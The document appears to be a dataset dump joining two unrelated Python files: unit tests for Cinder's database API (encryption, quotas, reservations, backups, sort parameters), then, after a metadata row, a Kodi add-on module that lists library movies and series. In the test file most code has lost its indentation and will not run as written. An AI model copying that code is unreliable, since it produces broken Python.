"""Tests for the db.api.volume_(type_)?encryption_* methods."""
_ignored_keys = [
'deleted',
'deleted_at',
'created_at',
'updated_at',
'encryption_id',
]
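    # ids and timestamps differ on every run, so object comparisons skip them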
def setUp(self):
super(DBAPIEncryptionTestCase, self).setUp()
self.created = \
[db.volume_type_encryption_create(self.ctxt,
values['volume_type_id'], values)
for values in self._get_values()]
def _get_values(self, one=False, updated=False):
base_values = {
'cipher': 'fake_cipher',
'key_size': 256,
'provider': 'fake_provider',
'volume_type_id': 'fake_type',
'control_location': 'front-end',
}
updated_values = {
'cipher': 'fake_updated_cipher',
'key_size': 512,
'provider': 'fake_updated_provider',
'volume_type_id': 'fake_type',
'control_location': 'front-end',
}
if one:
return base_values
if updated:
values = updated_values
else:
values = base_values
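        # compose() derives three distinct rows from the chosen template by
        # appending (strings) or adding (numbers) the index 1..3 to each value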
def compose(val, step):
if isinstance(val, str):
step = str(step)
return val + step
return [dict([(k, compose(v, i)) for k, v in values.items()])
for i in range(1, 4)]
def test_volume_type_encryption_create(self):
values = self._get_values()
for i, encryption in enumerate(self.created):
self._assertEqualObjects(values[i], encryption, self._ignored_keys)
def test_volume_type_encryption_update(self):
update_values = self._get_values(updated=True)
self.updated = \
[db.volume_type_encryption_update(self.ctxt,
values['volume_type_id'], values)
for values in update_values]
for i, encryption in enumerate(self.updated):
self._assertEqualObjects(update_values[i], encryption,
self._ignored_keys)
def test_volume_type_encryption_get(self):
for encryption in self.created:
encryption_get = \
db.volume_type_encryption_get(self.ctxt,
encryption['volume_type_id'])
self._assertEqualObjects(encryption, encryption_get,
self._ignored_keys)
def test_volume_type_update_with_no_create(self):
self.assertRaises(exception.VolumeTypeEncryptionNotFound,
db.volume_type_encryption_update,
self.ctxt,
'fake_no_create_type',
{'cipher': 'fake_updated_cipher'})
def test_volume_type_encryption_delete(self):
values = {
'cipher': 'fake_cipher',
'key_size': 256,
'provider': 'fake_provider',
'volume_type_id': 'fake_type',
'control_location': 'front-end',
}
encryption = db.volume_type_encryption_create(self.ctxt, 'fake_type',
values)
self._assertEqualObjects(values, encryption, self._ignored_keys)
db.volume_type_encryption_delete(self.ctxt,
encryption['volume_type_id'])
encryption_get = \
db.volume_type_encryption_get(self.ctxt,
encryption['volume_type_id'])
self.assertIsNone(encryption_get)
def test_volume_encryption_get(self):
# normal volume -- metadata should be None
volume = db.volume_create(self.ctxt, {})
values = db.volume_encryption_metadata_get(self.ctxt, volume.id)
self.assertEqual({'encryption_key_id': None}, values)
# encrypted volume -- metadata should match volume type
volume_type = self.created[0]
volume = db.volume_create(self.ctxt, {'volume_type_id':
volume_type['volume_type_id']})
values = db.volume_encryption_metadata_get(self.ctxt, volume.id)
expected = {
'encryption_key_id': volume.encryption_key_id,
'control_location': volume_type['control_location'],
'cipher': volume_type['cipher'],
'key_size': volume_type['key_size'],
'provider': volume_type['provider'],
}
self.assertEqual(expected, values)
class DBAPIReservationTestCase(BaseTest):
"""Tests for db.api.reservation_* methods."""
def setUp(self):
super(DBAPIReservationTestCase, self).setUp()
self.values = {
'uuid': 'sample-uuid',
'project_id': 'project1',
'resource': 'resource',
'delta': 42,
'expire': (datetime.datetime.utcnow() +
datetime.timedelta(days=1)),
'usage': {'id': 1}
}
def test_reservation_commit(self):
reservations = _quota_reserve(self.ctxt, 'project1')
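        # _quota_reserve (a test helper defined elsewhere in this module)
        # reserves 1 volume and 2 gigabytes for the project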
expected = {'project_id': 'project1',
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt, 'project1'))
db.reservation_commit(self.ctxt, reservations, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 0, 'in_use': 1},
'gigabytes': {'reserved': 0, 'in_use': 2},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
def test_reservation_rollback(self):
reservations = _quota_reserve(self.ctxt, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
db.reservation_rollback(self.ctxt, reservations, 'project1')
expected = {'project_id': 'project1',
'volumes': {'reserved': 0, 'in_use': 0},
'gigabytes': {'reserved': 0, 'in_use': 0},
}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
def test_reservation_expire(self):
self.values['expire'] = datetime.datetime.utcnow() + \
datetime.timedelta(days=1)
_quota_reserve(self.ctxt, 'project1')
db.reservation_expire(self.ctxt)
expected = {'project_id': 'project1',
'gigabytes': {'reserved': 0, 'in_use': 0},
'volumes': {'reserved': 0, 'in_use': 0}}
self.assertEqual(expected,
db.quota_usage_get_all_by_project(
self.ctxt,
'project1'))
class DBAPIQuotaClassTestCase(BaseTest):
"""Tests for db.api.quota_class_* methods."""
def setUp(self):
super(DBAPIQuotaClassTestCase, self).setUp()
self.sample_qc = db.quota_class_create(self.ctxt, 'test_qc',
'test_resource', 42)
def test_quota_class_get(self):
qc = db.quota_class_get(self.ctxt, 'test_qc', 'test_resource')
self._assertEqualObjects(self.sample_qc, qc)
def test_quota_class_destroy(self):
db.quota_class_destroy(self.ctxt, 'test_qc', 'test_resource')
self.assertRaises(exception.QuotaClassNotFound,
db.quota_class_get, self.ctxt,
'test_qc', 'test_resource')
def test_quota_class_get_not_found(self):
self.assertRaises(exception.QuotaClassNotFound,
db.quota_class_get, self.ctxt, 'nonexistent',
'nonexistent')
def test_quota_class_get_all_by_name(self):
db.quota_class_create(self.ctxt, 'test2', 'res1', 43)
db.quota_class_create(self.ctxt, 'test2', 'res2', 44)
self.assertEqual({'class_name': 'test_qc', 'test_resource': 42},
db.quota_class_get_all_by_name(self.ctxt, 'test_qc'))
self.assertEqual({'class_name': 'test2', 'res1': 43, 'res2': 44},
db.quota_class_get_all_by_name(self.ctxt, 'test2'))
def test_quota_class_update(self):
db.quota_class_update(self.ctxt, 'test_qc', 'test_resource', 43)
updated = db.quota_class_get(self.ctxt, 'test_qc', 'test_resource')
self.assertEqual(43, updated['hard_limit'])
def test_quota_class_destroy_all_by_name(self):
db.quota_class_create(self.ctxt, 'test2', 'res1', 43)
db.quota_class_create(self.ctxt, 'test2', 'res2', 44)
db.quota_class_destroy_all_by_name(self.ctxt, 'test2')
self.assertEqual({'class_name': 'test2'},
db.quota_class_get_all_by_name(self.ctxt, 'test2'))
class DBAPIQuotaTestCase(BaseTest):
"""Tests for db.api.reservation_* methods."""
def test_quota_create(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
self.assertEqual(quota.resource, 'resource')
self.assertEqual(quota.hard_limit, 99)
self.assertEqual(quota.project_id, 'project1')
def test_quota_get(self):
quota = db.quota_create(self.ctxt, 'project1', 'resource', 99)
quota_db = db.quota_get(self.ctxt, 'project1', 'resource')
self._assertEqualObjects(quota, quota_db)
def test_quota_get_all_by_project(self):
for i in range(3):
for j in range(3):
db.quota_create(self.ctxt, 'proj%d' % i, 'res%d' % j, j)
for i in range(3):
quotas_db = db.quota_get_all_by_project(self.ctxt, 'proj%d' % i)
self.assertEqual(quotas_db, {'project_id': 'proj%d' % i,
'res0': 0,
'res1': 1,
'res2': 2})
def test_quota_update(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
db.quota_update(self.ctxt, 'project1', 'resource1', 42)
quota = db.quota_get(self.ctxt, 'project1', 'resource1')
self.assertEqual(quota.hard_limit, 42)
self.assertEqual(quota.resource, 'resource1')
self.assertEqual(quota.project_id, 'project1')
def test_quota_update_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_update,
self.ctxt,
'project1',
'resource1',
42)
def test_quota_get_nonexistent(self):
self.assertRaises(exception.ProjectQuotaNotFound,
db.quota_get,
self.ctxt,
'project1',
'resource1')
def test_quota_reserve(self):
reservations = _quota_reserve(self.ctxt, 'project1')
self.assertEqual(len(reservations), 2)
quota_usage = db.quota_usage_get_all_by_project(self.ctxt, 'project1')
self.assertEqual({'project_id': 'project1',
'gigabytes': {'reserved': 2, 'in_use': 0},
'volumes': {'reserved': 1, 'in_use': 0}},
quota_usage)
def test_quota_destroy(self):
db.quota_create(self.ctxt, 'project1', 'resource1', 41)
self.assertIsNone(db.quota_destroy(self.ctxt, 'project1',
'resource1'))
self.assertRaises(exception.ProjectQuotaNotFound, db.quota_get,
self.ctxt, 'project1', 'resource1')
def test_quota_destroy_by_project(self):
# Create limits, reservations and usage for project
project = 'project1'
_quota_reserve(self.ctxt, project)
expected_usage = {'project_id': project,
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0}}
expected = {'project_id': project, 'gigabytes': 2, 'volumes': 1}
# Check that quotas are there
self.assertEqual(expected,
db.quota_get_all_by_project(self.ctxt, project))
self.assertEqual(expected_usage,
db.quota_usage_get_all_by_project(self.ctxt, project))
# Destroy only the limits
db.quota_destroy_by_project(self.ctxt, project)
# Confirm that limits have been removed
self.assertEqual({'project_id': project},
db.quota_get_all_by_project(self.ctxt, project))
# But that usage and reservations are the same
self.assertEqual(expected_usage,
db.quota_usage_get_all_by_project(self.ctxt, project))
    def test_quota_destroy_sqlalchemy_all_by_project(self):
# Create limits, reservations and usage for project
project = 'project1'
_quota_reserve(self.ctxt, project)
expected_usage = {'project_id': project,
'volumes': {'reserved': 1, 'in_use': 0},
'gigabytes': {'reserved': 2, 'in_use': 0}}
expected = {'project_id': project, 'gigabytes': 2, 'volumes': 1}
expected_result = {'project_id': project}
# Check that quotas are there
self.assertEqual(expected,
db.quota_get_all_by_project(self.ctxt, project))
self.assertEqual(expected_usage,
db.quota_usage_get_all_by_project(self.ctxt, project))
# Destroy all quotas using SQLAlchemy Implementation
sqlalchemy_api.quota_destroy_all_by_project(self.ctxt, project,
only_quotas=False)
# Check that all quotas have been deleted
self.assertEqual(expected_result,
db.quota_get_all_by_project(self.ctxt, project))
self.assertEqual(expected_result,
db.quota_usage_get_all_by_project(self.ctxt, project))
def test_quota_usage_get_nonexistent(self):
self.assertRaises(exception.QuotaUsageNotFound,
db.quota_usage_get,
self.ctxt,
'p1',
                          'nonexistent_resource')
def test_quota_usage_get(self):
_quota_reserve(self.ctxt, 'p1')
quota_usage = db.quota_usage_get(self.ctxt, 'p1', 'gigabytes')
expected = {'resource': 'gigabytes', 'project_id': 'p1',
'in_use': 0, 'reserved': 2, 'total': 2}
        for key, value in expected.items():
self.assertEqual(value, quota_usage[key], key)
def test_quota_usage_get_all_by_project(self):
_quota_reserve(self.ctxt, 'p1')
expected = {'project_id': 'p1',
'volumes': {'in_use': 0, 'reserved': 1},
'gigabytes': {'in_use': 0, 'reserved': 2}}
self.assertEqual(expected, db.quota_usage_get_all_by_project(
self.ctxt, 'p1'))
class DBAPIIscsiTargetTestCase(BaseTest):
"""Unit tests for cinder.db.api.iscsi_target_*."""
def _get_base_values(self):
return {'target_num': 10, 'host': 'fake_host'}
def test_iscsi_target_create_safe(self):
target = db.iscsi_target_create_safe(self.ctxt,
self._get_base_values())
self.assertTrue(target['id'])
self.assertEqual(target['host'], 'fake_host')
self.assertEqual(target['target_num'], 10)
def test_iscsi_target_count_by_host(self):
for i in range(3):
values = self._get_base_values()
values['target_num'] += i
db.iscsi_target_create_safe(self.ctxt, values)
self.assertEqual(db.iscsi_target_count_by_host(self.ctxt, 'fake_host'),
3)
def test_integrity_error(self):
values = self._get_base_values()
values['id'] = 1
db.iscsi_target_create_safe(self.ctxt, values)
self.assertFalse(db.iscsi_target_create_safe(self.ctxt, values))
class DBAPIBackupTestCase(BaseTest):
"""Tests for db.api.backup_* methods."""
_ignored_keys = ['id', 'deleted', 'deleted_at', 'created_at', 'updated_at']
def setUp(self):
super(DBAPIBackupTestCase, self).setUp()
self.created = [db.backup_create(self.ctxt, values)
for values in self._get_values()]
def _get_values(self, one=False):
base_values = {
'user_id': 'user',
'project_id': 'project',
'volume_id': 'volume',
'host': 'host',
'availability_zone': 'zone',
'display_name': 'display',
'display_description': 'description',
'container': 'container',
'status': 'status',
'fail_reason': 'test',
'service_metadata': 'metadata',
'service': 'service',
'parent_id': "parent_id",
'size': 1000,
'object_count': 100}
if one:
return base_values
def compose(val, step):
if isinstance(val, bool):
return val
if isinstance(val, str):
step = str(step)
return val + step
return [dict([(k, compose(v, i)) for k, v in base_values.items()])
for i in range(1, 4)]
def test_backup_create(self):
values = self._get_values()
for i, backup in enumerate(self.created):
self.assertTrue(backup['id'])
self._assertEqualObjects(values[i], backup, self._ignored_keys)
def test_backup_get(self):
for backup in self.created:
backup_get = db.backup_get(self.ctxt, backup['id'])
self._assertEqualObjects(backup, backup_get)
    def test_backup_get_all(self):
all_backups = db.backup_get_all(self.ctxt)
self._assertEqualListsOfObjects(self.created, all_backups)
    def test_backup_get_all_by_filter(self):
filters = {'status': self.created[1]['status']}
filtered_backups = db.backup_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects([self.created[1]], filtered_backups)
filters = {'display_name': self.created[1]['display_name']}
filtered_backups = db.backup_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects([self.created[1]], filtered_backups)
filters = {'volume_id': self.created[1]['volume_id']}
filtered_backups = db.backup_get_all(self.ctxt, filters=filters)
self._assertEqualListsOfObjects([self.created[1]], filtered_backups)
def test_backup_get_all_by_host(self):
byhost = db.backup_get_all_by_host(self.ctxt,
self.created[1]['host'])
self._assertEqualObjects(self.created[1], byhost[0])
def test_backup_get_all_by_project(self):
byproj = db.backup_get_all_by_project(self.ctxt,
self.created[1]['project_id'])
self._assertEqualObjects(self.created[1], byproj[0])
def test_backup_update_nonexistent(self):
self.assertRaises(exception.BackupNotFound,
db.backup_update,
self.ctxt, 'nonexistent', {})
def test_backup_update(self):
updated_values = self._get_values(one=True)
update_id = self.created[1]['id']
updated_backup = db.backup_update(self.ctxt, update_id,
updated_values)
self._assertEqualObjects(updated_values, updated_backup,
self._ignored_keys)
def test_backup_update_with_fail_reason_truncation(self):
updated_values = self._get_values(one=True)
fail_reason = '0' * 512
updated_values['fail_reason'] = fail_reason
update_id = self.created[1]['id']
updated_backup = db.backup_update(self.ctxt, update_id,
updated_values)
updated_values['fail_reason'] = fail_reason[:255]
self._assertEqualObjects(updated_values, updated_backup,
self._ignored_keys)
def test_backup_destroy(self):
for backup in self.created:
db.backup_destroy(self.ctxt, backup['id'])
self.assertFalse(db.backup_get_all(self.ctxt))
def test_backup_not_found(self):
self.assertRaises(exception.BackupNotFound, db.backup_get, self.ctxt,
'notinbase')
class DBAPIProcessSortParamTestCase(test.TestCase):
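    """Tests for sqlalchemy_api.process_sort_params."""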
def test_process_sort_params_defaults(self):
'''Verifies default sort parameters.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params([], [])
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(None, None)
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_keys(self):
'''Verifies that the default keys can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'])
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_override_default_dir(self):
'''Verifies that the default direction can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_dir='dir1')
self.assertEqual(['created_at', 'id'], sort_keys)
self.assertEqual(['dir1', 'dir1'], sort_dirs)
def test_process_sort_params_override_default_key_and_dir(self):
'''Verifies that the default key and dir can be overridden.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=['key1', 'key2', 'key3'],
default_dir='dir1')
self.assertEqual(['key1', 'key2', 'key3'], sort_keys)
self.assertEqual(['dir1', 'dir1', 'dir1'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
[], [], default_keys=[], default_dir='dir1')
self.assertEqual([], sort_keys)
self.assertEqual([], sort_dirs)
def test_process_sort_params_non_default(self):
'''Verifies that non-default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['key1', 'key2'], ['asc', 'desc'])
self.assertEqual(['key1', 'key2', 'created_at', 'id'], sort_keys)
# First sort_dir in list is used when adding the default keys
self.assertEqual(['asc', 'desc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default(self):
'''Verifies that default keys are added correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['asc', 'desc'])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'desc', 'asc'], sort_dirs)
# Include default key value, rely on default direction
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [])
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['asc', 'asc', 'asc'], sort_dirs)
def test_process_sort_params_default_dir(self):
'''Verifies that the default dir is applied to all keys.'''
# Direction is set, ignore default dir
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], ['desc'], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc'], sort_dirs)
# But should be used if no direction is set
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2'], [], default_dir='dir')
self.assertEqual(['id', 'key2', 'created_at'], sort_keys)
self.assertEqual(['dir', 'dir', 'dir'], sort_dirs)
def test_process_sort_params_unequal_length(self):
'''Verifies that a sort direction list is applied correctly.'''
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'desc', 'desc', 'desc'], sort_dirs)
        # Unspecified directions default to the first sort_dir in the list
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'desc', 'desc'], sort_dirs)
sort_keys, sort_dirs = sqlalchemy_api.process_sort_params(
['id', 'key2', 'key3'], ['desc', 'asc', 'asc'])
self.assertEqual(['id', 'key2', 'key3', 'created_at'], sort_keys)
self.assertEqual(['desc', 'asc', 'asc', 'desc'], sort_dirs)
def test_process_sort_params_extra_dirs_lengths(self):
'''InvalidInput raised if more directions are given.'''
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key1', 'key2'],
['asc', 'desc', 'desc'])
def test_process_sort_params_invalid_sort_dir(self):
'''InvalidInput raised if invalid directions are given.'''
for dirs in [['foo'], ['asc', 'foo'], ['asc', 'desc', 'foo']]:
self.assertRaises(exception.InvalidInput,
sqlalchemy_api.process_sort_params,
['key'],
dirs)
class DBAPIDriverInitiatorDataTestCase(BaseTest):
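    """Tests for db.api.driver_initiator_data_* methods."""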
initiator = 'iqn.1993-08.org.debian:01:222'
namespace = 'test_ns'
def test_driver_initiator_data_set_and_remove(self):
data_key = 'key1'
data_value = 'value1'
update = {
'set_values': {
data_key: data_value
}
}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertIsNotNone(data)
self.assertEqual(data_key, data[0]['key'])
self.assertEqual(data_value, data[0]['value'])
update = {'remove_values': [data_key]}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertIsNotNone(data)
self.assertEqual([], data)
def test_driver_initiator_data_no_changes(self):
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, {})
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertIsNotNone(data)
self.assertEqual([], data)
def test_driver_initiator_data_update_existing_values(self):
data_key = 'key1'
data_value = 'value1'
update = {'set_values': {data_key: data_value}}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data_value = 'value2'
update = {'set_values': {data_key: data_value}}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
data = db.driver_initiator_data_get(self.ctxt, self.initiator,
self.namespace)
self.assertEqual(data_value, data[0]['value'])
def test_driver_initiator_data_remove_not_existing(self):
update = {'remove_values': ['key_that_doesnt_exist']}
db.driver_initiator_data_update(self.ctxt, self.initiator,
self.namespace, update)
| apache-2.0 | -9,099,845,731,141,413,000 | 43.838286 | 79 | 0.515338 | false |
Mzero2010/MaxZone | plugin.video.Mzero/channels/biblioteca.py | 1 | 26859 | # -*- coding: utf-8 -*-
# ------------------------------------------------------------
# Mzero - XBMC Plugin
# Channel for the Mzero library
# http://blog.tvalacarta.info/plugin-xbmc/Mzero/
# ------------------------------------------------------------
import os
from core import config
from core import filetools
from core import logger
from core import scrapertools
from core.item import Item
from core import library
from platformcode import platformtools
def mainlist(item):
logger.info()
itemlist = list()
itemlist.append(Item(channel=item.channel, action="peliculas", title="Películas",
category="Biblioteca de películas",
thumbnail="http://media.tvalacarta.info/Mzero/squares/thumb_biblioteca_peliculas.png"))
itemlist.append(Item(channel=item.channel, action="series", title="Series",
category="Biblioteca de series",
thumbnail="http://media.tvalacarta.info/Mzero/squares/thumb_biblioteca_series.png"))
#itemlist.append(Item(channel=item.channel, title="", action="", folder=False, thumbnail=item.thumbnail))
#itemlist.append(Item(channel=item.channel, action="channel_config", title="Opciones"))
return itemlist
def channel_config(item):
    return platformtools.show_channel_settings(channelpath=os.path.join(config.get_runtime_path(), "channels", item.channel))
def peliculas(item):
logger.info()
itemlist = []
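    # Every movie in the library lives in its own folder with a .nfo holding the
    # serialized Item; walk the tree and rebuild one list entry per movie.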
for raiz, subcarpetas, ficheros in filetools.walk(library.MOVIES_PATH):
for f in ficheros:
if f.endswith(".nfo"):
nfo_path = filetools.join(raiz, f)
head_nfo, new_item = library.read_nfo(nfo_path)
new_item.nfo = nfo_path
new_item.path = raiz
new_item.thumbnail = new_item.contentThumbnail
new_item.text_color = "blue"
if not filetools.exists(filetools.join(new_item.path, filetools.basename(new_item.strm_path))):
                    # If the strm was removed from the Kodi library, do not show it
continue
                # Context menu: mark as watched/unwatched
visto = new_item.library_playcounts.get(os.path.splitext(f)[0], 0)
new_item.infoLabels["playcount"] = visto
if visto > 0:
texto_visto = "Marcar película como no vista"
contador = 0
else:
texto_visto = "Marcar película como vista"
contador = 1
                # Context menu: remove movie/channel
num_canales = len(new_item.library_urls)
if "descargas" in new_item.library_urls:
num_canales -= 1
if num_canales > 1:
texto_eliminar = "Eliminar película/canal"
multicanal = True
else:
texto_eliminar = "Eliminar esta película"
multicanal = False
new_item.context = [{"title": texto_visto,
"action": "mark_content_as_watched",
"channel": "biblioteca",
"playcount": contador},
{"title": texto_eliminar,
"action": "eliminar",
"channel": "biblioteca",
"multicanal": multicanal}]
# ,{"title": "Cambiar contenido (PENDIENTE)",
# "action": "",
# "channel": "biblioteca"}]
#logger.debug("new_item: " + new_item.tostring('\n'))
itemlist.append(new_item)
return sorted(itemlist, key=lambda it: it.title.lower())
def series(item):
logger.info()
itemlist = []
    # Recursively collect every tvshow.nfo in the SERIES library
for raiz, subcarpetas, ficheros in filetools.walk(library.TVSHOWS_PATH):
for f in ficheros:
if f == "tvshow.nfo":
tvshow_path = filetools.join(raiz, f)
# logger.debug(tvshow_path)
head_nfo, item_tvshow = library.read_nfo(tvshow_path)
item_tvshow.title = item_tvshow.contentTitle
item_tvshow.path = raiz
item_tvshow.nfo = tvshow_path
                # Context menu: mark as watched/unwatched
visto = item_tvshow.library_playcounts.get(item_tvshow.contentTitle, 0)
item_tvshow.infoLabels["playcount"] = visto
if visto > 0:
texto_visto = "Marcar serie como no vista"
contador = 0
else:
texto_visto = "Marcar serie como vista"
contador = 1
                # Context menu: toggle automatic search for new episodes
if item_tvshow.active and int(item_tvshow.active) > 0:
texto_update = "Buscar automáticamente nuevos episodios: Desactivar"
value = 0
item_tvshow.text_color = "green"
else:
texto_update = "Buscar automáticamente nuevos episodios: Activar"
value = 1
item_tvshow.text_color = "0xFFDF7401"
                # Context menu: remove series/channel
num_canales = len(item_tvshow.library_urls)
if "descargas" in item_tvshow.library_urls:
num_canales -= 1
if num_canales > 1:
texto_eliminar = "Eliminar serie/canal"
multicanal = True
else:
texto_eliminar = "Eliminar esta serie"
multicanal = False
item_tvshow.context = [{"title": texto_visto,
"action": "mark_content_as_watched",
"channel": "biblioteca",
"playcount": contador},
{"title": texto_update,
"action": "mark_tvshow_as_updatable",
"channel": "biblioteca",
"active": value},
{"title": texto_eliminar,
"action": "eliminar",
"channel": "biblioteca",
"multicanal": multicanal},
{"title": "Buscar nuevos episodios ahora",
"action": "update_serie",
"channel":"biblioteca"}]
# ,{"title": "Cambiar contenido (PENDIENTE)",
# "action": "",
# "channel": "biblioteca"}]
# logger.debug("item_tvshow:\n" + item_tvshow.tostring('\n'))
itemlist.append(item_tvshow)
if itemlist:
itemlist = sorted(itemlist, key=lambda it: it.title.lower())
itemlist.append(Item(channel=item.channel, action="update_biblio", thumbnail=item.thumbnail,
title="Buscar nuevos episodios y actualizar biblioteca", folder=False))
return itemlist
def get_temporadas(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
itemlist = []
dict_temp = {}
raiz, carpetas_series, ficheros = filetools.walk(item.path).next()
    # Context menu: re-read tvshow.nfo
head_nfo, item_nfo = library.read_nfo(item.nfo)
if config.get_setting("no_pile_on_seasons", "biblioteca") == 2: # Siempre
return get_episodios(item)
for f in ficheros:
if f.endswith('.json'):
season = f.split('x')[0]
dict_temp[season] = "Temporada %s" % season
if config.get_setting("no_pile_on_seasons", "biblioteca") == 1 and len(dict_temp) == 1: # Sólo si hay una temporada
return get_episodios(item)
else:
        # Create one item per season
for season, title in dict_temp.items():
new_item = item.clone(action="get_episodios", title=title, contentSeason=season,
filtrar_season=True)
            # Context menu: mark the season as watched or not
visto = item_nfo.library_playcounts.get("season %s" % season, 0)
new_item.infoLabels["playcount"] = visto
if visto > 0:
texto = "Marcar temporada como no vista"
value = 0
else:
texto = "Marcar temporada como vista"
value = 1
new_item.context = [{"title": texto,
"action": "mark_season_as_watched",
"channel": "biblioteca",
"playcount": value}]
# logger.debug("new_item:\n" + new_item.tostring('\n'))
itemlist.append(new_item)
if len(itemlist) > 1:
itemlist = sorted(itemlist, key=lambda it: int(it.contentSeason))
if config.get_setting("show_all_seasons", "biblioteca") == True:
new_item = item.clone(action="get_episodios", title="*Todas las temporadas")
new_item.infoLabels["playcount"] = 0
itemlist.insert(0, new_item)
return itemlist
def get_episodios(item):
logger.info()
#logger.debug("item:\n" + item.tostring('\n'))
itemlist = []
    # Collect the episode files
raiz, carpetas_series, ficheros = filetools.walk(item.path).next()
    # Context menu: re-read tvshow.nfo
head_nfo, item_nfo = library.read_nfo(item.nfo)
    # Create a list item for every strm found
for i in ficheros:
if i.endswith('.strm'):
season_episode = scrapertools.get_season_and_episode(i)
if not season_episode:
                # The file name does not include season and episode numbers
continue
season, episode = season_episode.split("x")
            # When filtering by season, skip episodes from other seasons
if item.filtrar_season and int(season) != int(item.contentSeason):
continue
            # Read the data from the season_episode.nfo
nfo_path = filetools.join(raiz, i).replace('.strm', '.nfo')
head_nfo, epi = library.read_nfo(nfo_path)
            # Set the episode title when possible
if epi.contentTitle:
title_episodie = epi.contentTitle.strip()
else:
title_episodie = "Temporada %s Episodio %s" % \
(epi.contentSeason, str(epi.contentEpisodeNumber).zfill(2))
epi.contentTitle = "%sx%s" % (epi.contentSeason, str(epi.contentEpisodeNumber).zfill(2))
epi.title = "%sx%s - %s" % (epi.contentSeason, str(epi.contentEpisodeNumber).zfill(2), title_episodie)
if item_nfo.library_filter_show:
epi.library_filter_show = item_nfo.library_filter_show
            # Context menu: mark episode as watched or not
visto = item_nfo.library_playcounts.get(season_episode, 0)
epi.infoLabels["playcount"] = visto
if visto > 0:
texto = "Marcar episodio como no visto"
value = 0
else:
texto = "Marcar episodio como visto"
value = 1
epi.context = [{"title": texto,
"action": "mark_content_as_watched",
"channel": "biblioteca",
"playcount": value,
"nfo": item.nfo}]
# logger.debug("epi:\n" + epi.tostring('\n'))
itemlist.append(epi)
return sorted(itemlist, key=lambda it: (int(it.contentSeason), int(it.contentEpisodeNumber)))
def findvideos(item):
logger.info()
# logger.debug("item:\n" + item.tostring('\n'))
itemlist = []
list_canales = {}
item_local = None
if not item.contentTitle or not item.strm_path:
logger.debug("No se pueden buscar videos por falta de parametros")
return []
content_title = filter(lambda c: c not in ":*?<>|\/", item.contentTitle).strip().lower()
if item.contentType == 'movie':
item.strm_path = filetools.join(library.MOVIES_PATH, item.strm_path.strip('\/'))
path_dir = os.path.dirname(item.strm_path)
item.nfo = filetools.join(path_dir, os.path.basename(path_dir) + ".nfo")
else:
item.strm_path = filetools.join(library.TVSHOWS_PATH, item.strm_path.strip('\/'))
path_dir = os.path.dirname(item.strm_path)
item.nfo = filetools.join(path_dir, 'tvshow.nfo')
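    # Each "<content>[<channel>].json" file next to the strm stores the Item
    # needed to re-run findvideos on the source channel; collect one per channel.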
for fd in filetools.listdir(path_dir):
if fd.endswith('.json'):
contenido, nom_canal = fd[:-6].split('[')
if (content_title in contenido.strip() or item.contentType == 'movie') and nom_canal not in \
list_canales.keys():
list_canales[nom_canal] = filetools.join(path_dir, fd)
num_canales = len(list_canales)
if 'descargas' in list_canales:
json_path = list_canales['descargas']
